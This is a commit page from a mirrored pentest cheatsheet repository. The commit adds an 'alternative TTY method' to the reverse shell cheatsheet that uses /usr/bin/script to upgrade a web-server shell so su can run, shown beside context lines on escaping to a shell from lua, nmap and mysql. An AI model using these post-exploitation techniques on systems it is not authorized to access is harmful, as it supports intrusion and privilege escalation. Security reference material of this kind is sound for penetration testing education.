wanderer/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-09-28 11:19:45 +02:00
Code Issues Releases Activity

Alternative TTY method with /usr/bin/script

Browse Source
This commit is contained in:
Th1b4ud 2020-04-21 19:21:51 +02:00 committed by GitHub
parent eaac0e748e
commit 2740600a6b
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
Methodology and Resources/Reverse Shell Cheatsheet.md
View File

@ -431,6 +431,19 @@ lua: os.execute('/bin/sh')
- nmap: `!sh` - nmap: `!sh`
- mysql: `! bash` - mysql: `! bash`
Alternative TTY method
```
www-data@debian:/dev/shm$ su - user
su: must be run from a terminal
www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null
www-data@debian:/dev/shm$ su - user
Password: P4ssW0rD
user@debian:~$
```
## Fully interactive reverse shell on Windows ## Fully interactive reverse shell on Windows
The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals. The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals.